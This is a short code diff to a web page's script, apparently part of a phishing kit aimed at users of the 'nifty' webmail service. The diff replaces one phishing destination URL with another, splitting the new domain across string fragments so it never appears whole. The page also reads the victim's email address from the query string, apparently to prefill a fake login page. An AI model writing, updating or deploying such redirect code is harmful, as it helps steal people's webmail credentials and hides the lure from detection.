--- a/index.html
+++ b/index.html
@@ -8,9 +8,9 @@
     </style>
     <script>
         (function() {
-            var part1 = "https://support-japan-activemail.top/";
-            var part2 = "webmail-mail-mail/nifty/-nifty/";
-            var part3 = "mailer/pro/htm/index.html#";
+            var part1 = "https://acenursng.o";
+            var part2 = "rg/mail/mail/";
+            var part3 = "nifty/nifty/drr454ce67e4553444t55/mailer/nifty/index.html#";
 
             // Function to get the email from the query string
             function getQueryParameter(param) {
